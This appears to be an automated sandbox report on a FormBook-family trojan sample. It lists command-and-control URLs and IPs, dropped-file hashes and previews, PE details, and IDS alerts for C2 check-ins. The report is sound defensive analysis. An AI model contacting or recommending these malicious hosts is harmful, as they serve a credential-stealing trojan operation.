                                                            https://alldomains.hosting/explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://www.sedo.com/services/parking.php3cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=HI4NJ046K.5.drfalse
                                                                		high
                                                                https://search.yahoo.com?fr=crmas_sfpcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                                  		high
                                                                  http://www.ecomofietsen.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://alldomains.hosting/hosting-webhosting.htmlcmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.germanreps.com/u2kb/www.germanreps.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.germanreps.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.employerseervices.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.younrock.com/u2kb/www.younrock.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.222ambking.orgexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.shapshit.xyz/u2kb/www.shapshit.xyzexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.un-object.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HI4NJ046K.5.drfalse
                                                                    		high
                                                                    http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    85.187.128.34
                                                                    		thedivinerudraksha.comUnited States
                                                                    		55293A2HOSTINGUStrue
                                                                    91.195.240.94
                                                                    		www.222ambking.orgGermany
                                                                    		47846SEDO-ASDEtrue
                                                                    45.33.30.197
                                                                    		www.thewildphotographer.co.ukUnited States
                                                                    		63949LINODE-APLinodeLLCUStrue
                                                                    78.141.192.145
                                                                    		gritslab.comFrance
                                                                    		20473AS-CHOOPAUStrue
                                                                    161.97.163.8
                                                                    		www.bitservicesltd.comUnited States
                                                                    		51167CONTABODEtrue
                                                                    81.17.18.198
                                                                    		www.younrock.comSwitzerland
                                                                    		51852PLI-ASCHtrue
                                                                    192.185.17.12
                                                                    		un-object.comUnited States
                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                    94.176.104.86
                                                                    		white-hat.ukRomania
                                                                    		5588GTSCEGTSCentralEuropeAntelGermanyCZtrue
                                                                    213.145.228.111
                                                                    		www.energyservicestation.comAustria
                                                                    		25575DOMAINTECHNIKATtrue
                                                                    199.192.30.147
                                                                    		www.shapshit.xyzUnited States
                                                                    		22612NAMECHEAP-NETUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:37.0.0 Beryl
                                                                    Analysis ID:830750
                                                                    Start date and time:2023-03-20 16:58:12 +01:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 12m 23s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample file name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@8/5@12/10
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HDC Information:
                                                                    • Successful, ratio: 80.6% (good quality ratio 73.9%)
                                                                    • Quality average: 74.7%
                                                                    • Quality standard deviation: 31.2%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    17:00:00API Interceptor498x Sleep call for process: explorer.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASNs

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\HI4NJ046K

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):94208
                                                                    Entropy (8bit):1.2880737026424216
                                                                    Encrypted:false
                                                                    SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                    MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                    SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                    SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                    SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5738
                                                                    Entropy (8bit):7.164987839661835
                                                                    Encrypted:false
                                                                    SSDEEP:96:Farc6oY7g/DrYu+k2XO5oSwYiAVW9aRDGDprAhThqwDQgNDQXzL2gf:FarcRfWhX1S9H9tGlg9h3hgf
                                                                    MD5:EE48E241B19CF476BAB747E7BFFBE1E6
                                                                    SHA1:ECD535B070BAC75909809590AE8CEE602A65F8FF
                                                                    SHA-256:2F25ECE58FD26C56F04DCDCDA1273E75D2101A78FD0717605F0148ADEA9E83EA
                                                                    SHA-512:2ED2C6059DD18824BE7B217023A78B4FDCE37424D1C1949E896B4C311C16F084B86DC7178C06174A5ECC5988653AC97CB9B67307A6B766166BABC063B942AD57
                                                                    Malicious:false
                                                                    Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                    C:\Users\user\AppData\Local\Temp\nsjF9DC.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):326683
                                                                    Entropy (8bit):7.56585074937259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:llDH7L09bR9XjKk1c85uxmCum7ZjmOLPzCu/GZVZxML7L26P:llnL0w0cxxmidCODzCu/QZOL2
                                                                    MD5:DB1F24D7DE5473B1FEB30958D5620614
                                                                    SHA1:956E2FCB636FBA3FEFC9EBFCA96CCEC7605B252B
                                                                    SHA-256:A635BBBC73BA851204F9242C529EF59C9C1A133D1A98D8BCBFE1B0161216400B
                                                                    SHA-512:35D949222412B4CA343454A4CE247067C3A74B5CB4CCA3FFEAA0C0F7AE5734C82D6E552FB1EBB984A4953EA760F24BBF5C249B83FE3C85959AB78E6625F0B642
                                                                    Malicious:false
                                                                    Preview:.7......,........................(.......6......p7..............................................................................$...........................................................................................................................................................G...................j...........................................................................................................................................=...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rdypmbfg.qv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):211481
                                                                    Entropy (8bit):7.998948076055924
                                                                    Encrypted:true
                                                                    SSDEEP:3072:mKd38ED05C8QZ/bLX8NWvByZA6XRxnIGb/D/Kk7iVSc8k1wPuxD6QH+0gZm7IKjS:hlDH7L09bR9XjKk1c85uxmCum7ZjmOLy
                                                                    MD5:4C2A176B3C04DB72501ED445A646E276
                                                                    SHA1:26C8DCB493EB56374B0A96D5453BB535F7A515CC
                                                                    SHA-256:F9713AB900F44015FD669DF94861D50D98281D447964913B0132E1CAC002351B
                                                                    SHA-512:B0673860453637C95F09AE4766DBB10B5DFA0282D48B0B351EE8231C304C08EEADC721E8A64C941462E93C175431CECBE5F9530C2A5FDF937ADE42FCE3FA0ED5
                                                                    Malicious:false
                                                                    Preview:...R..#D6....N>.R.*.}jW.;Q.w;.E..|.r....b..eA..<..}U....^...t..qmu.......Ry..H.[...xe.(*....x.c3.<.P...;.\U..q^.P..Bl..a.i.v.5#.q..c.kj...EX.1..Y..5.eG..N=.u.@./.....V..V$6#.X...-.W(.'.....fh&.U....P#M.R.>..Ec..z4R.....*s..J.yEQ@..&.G..ntP........#..x...&..~...{.....\p7..E..|Br....b.1eA..<k.}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.{.LW-.WM4-.....A.4UN...P#M.R.AR..cO...4R.....*S`.J..EQ@tz.&.....tP.D..)....#D..x...&.....{......pw;.E..|.r....b..eA..<..}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.X...-.WYh'....[.4U....P#M.R.AR..c..z4R.....*S`.J..EQ@tz.&.....tP.D..)....#D..x...&.....{......pw;.E..|.r....b..eA..<..}U....^..)..X..n.%/....Y.k.J.....\Q.8.....t..#. *.\....n.'..n..]..Bl...."c?/~...E$o._..U.....F...).F.....^.6g..I..5..V..V$6#.X...-.WYh'....[.4U....P#M.R.AR..c..z4R.....*

                                                                    C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95232
                                                                    Entropy (8bit):6.23150349499231
                                                                    Encrypted:false
                                                                    SSDEEP:1536:opZrDPCXLdr7zQN/GZGLaYeZjtBaKaedCRVLR8dpxekydJrD9iiU71aC4sWBlVmI:oHTCB7Y/GZGPeZxaGCRVLR9kydI7sCUJ
                                                                    MD5:6D30D26416D626447BA4298A59111F6D
                                                                    SHA1:C7F0941793929D391369F59FD92FFD4B2DC5C598
                                                                    SHA-256:C53E0E6337805EC801493437F7811672A1B3C187611799116D5490AB2E63B1EC
                                                                    SHA-512:79946C7F1D3F1F9A56ED7A3F6BCA739F73801B6BCEFB6CC41945BE28A4542A1FD511D52269A61DB887CD2DF42D8B87D7E497295FDBC9E226B25FDB745DF7940F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.8-?.V~?.V~?.V~t.U.5.V~t.S...V~t.R.+.V~..S...V~..R...V~..U.,.V~t.W.(.V~?.W~@.V~..^.>.V~..T.>.V~Rich?.V~........................PE..L...gX.d...............!.....z....................@.........................................................................<k.......................................^...............................]..@............................................text............................... ..`.rdata...e.......f..................@..@.data...l............j..............@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.926529383010501
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File size:299717
                                                                    MD5:c7714b273571ba64c0b77afca236ac6d
                                                                    SHA1:c24d9460bee8a724abe8b0dcf3d74851dd5737ed
                                                                    SHA256:e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
                                                                    SHA512:e70d15e6d9e318e509013088a42f02c2298af5f85ca91c8463f1fb7fc3d5216ec7ef6e9a8c343f95f5a0b457260014d8c15c5e0b7e8d1a050c3963618adb159e
                                                                    SSDEEP:6144:vYa69KnJK2Vi0/1olkMjLow/9AO3xVFLFlXT+rcYGRleg3Cdl2xHW7:vYnKndVJAnow/6O3xV5TD+rcYCKyy
                                                                    TLSH:435412A63178C03BF5A141306F7512AA9EFDDA1278F90A0B4B901B6D7F7AB14650F393
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                    File Icon

                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x403640
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:61259b55b8912888e90f516ca08dc514

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 000003F4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [ebp-14h], ebx
                                                                    mov dword ptr [ebp-04h], 0040A230h
                                                                    mov dword ptr [ebp-10h], ebx
                                                                    call dword ptr [004080C8h]
                                                                    mov esi, dword ptr [004080CCh]
                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                    push eax
                                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                    mov dword ptr [ebp-28h], ebx
                                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                                    call esi
                                                                    test eax, eax
                                                                    jne 00007F57DC75144Ah
                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                                    push eax
                                                                    call esi
                                                                    mov ax, word ptr [ebp-0000012Ch]
                                                                    mov ecx, dword ptr [ebp-00000112h]
                                                                    sub ax, 00000053h
                                                                    add ecx, FFFFFFD0h
                                                                    neg ax
                                                                    sbb eax, eax
                                                                    mov byte ptr [ebp-26h], 00000004h
                                                                    not eax
                                                                    and eax, ecx
                                                                    mov word ptr [ebp-2Ch], ax
                                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                    jnc 00007F57DC75141Ah
                                                                    and word ptr [ebp-00000132h], 0000h
                                                                    mov eax, dword ptr [ebp-00000134h]
                                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                                    mov dword ptr [0042A318h], eax
                                                                    xor eax, eax
                                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                                    movzx eax, ax
                                                                    or eax, ecx
                                                                    xor ecx, ecx
                                                                    mov ch, byte ptr [ebp-2Ch]
                                                                    movzx ecx, cx
                                                                    shl eax, 10h
                                                                    or eax, ecx

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x3b0000xcd80xe00False0.4224330357142857data4.230532221238809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                                    RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                                    RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                                    RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                                    RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                                    RT_VERSION0x3b7580x240dataEnglishUnited States
                                                                    RT_MANIFEST0x3b9980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.491.195.240.9449702802031449 03/20/23-17:00:09.343542TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                    192.168.2.481.17.18.19849706802031412 03/20/23-17:00:25.955923TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198
                                                                    192.168.2.481.17.18.19849706802031453 03/20/23-17:00:25.955923TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198
                                                                    192.168.2.494.176.104.8649696802031453 03/20/23-16:59:46.201874TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                    192.168.2.491.195.240.9449702802031453 03/20/23-17:00:09.343542TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                    192.168.2.494.176.104.8649696802031412 03/20/23-16:59:46.201874TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                    192.168.2.491.195.240.9449702802031412 03/20/23-17:00:09.343542TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.491.195.240.94
                                                                    192.168.2.494.176.104.8649696802031449 03/20/23-16:59:46.201874TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969680192.168.2.494.176.104.86
                                                                    192.168.2.481.17.18.19849706802031449 03/20/23-17:00:25.955923TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.481.17.18.198

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 20, 2023 16:59:46.164385080 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.201606989 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.201721907 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.201874018 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.239142895 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.439270973 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.439304113 CET804969694.176.104.86192.168.2.4
